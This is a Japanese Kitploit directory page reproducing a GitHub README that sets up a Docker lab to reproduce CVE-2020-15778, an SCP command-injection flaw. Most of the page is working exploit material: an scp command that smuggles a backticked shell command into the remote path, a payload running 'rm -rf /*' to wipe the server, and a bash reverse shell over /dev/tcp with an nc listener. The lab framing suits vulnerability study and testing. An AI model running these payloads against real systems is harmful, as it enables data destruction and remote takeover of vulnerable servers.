Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-15778 — CVE-2020-15778のSCPコマンドインジェクションエクスプロイトを再現し、リモートコード実行とリバースシェルペイロードをテストするためのDockerベースのクライアント・サーバー構成を提供します。 | Kitploit
ツール/GitHubGitHub/yifanzhg/cve-2020-15778
コンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

CVE-2020-15778のSCPコマンドインジェクションエクスプロイトを再現し、リモートコード実行とリバースシェルペイロードをテストするためのDockerベースのクライアント・サーバー構成を提供します。

リポジトリを見る
332年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-15778

はじめに

このリポジトリは CVE-2020-15778 を再現するものです。

手順

  1. scpサーバーとクライアント用のDockerイメージをビルドする
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. コンテナ内でscpサーバーを起動する。
root@kitploit:~
docker run -d -P --name scp-server server-cve

次のコマンドでscpサーバーの内部IPアドレスを取得する:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. コンテナ内でクライアントを実行する。
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. クライアントでscpコマンドを実行して、独自のシェルコマンドをscpサーバーに注入する。

クライアントのターミナルで以下を実行する:

root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

パスワードは「PASSWORD」です。

例

このエクスプロイトの例をいくつか示します。

  1. サーバー内のすべてを削除してクラッシュさせる。
root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. scpサーバーのbashをクライアントへリフレクトする(sshを模倣)。

クライアントマシンでポートを待ち受ける。

root@kitploit:~
nc -lvvp 8080

scpを使用して、サーバーに対話型bashをクライアントマシンへマッピングさせる。

root@kitploit:~
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

クライアントのIPアドレスは次のコマンドで取得する:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
ツールをダウンロード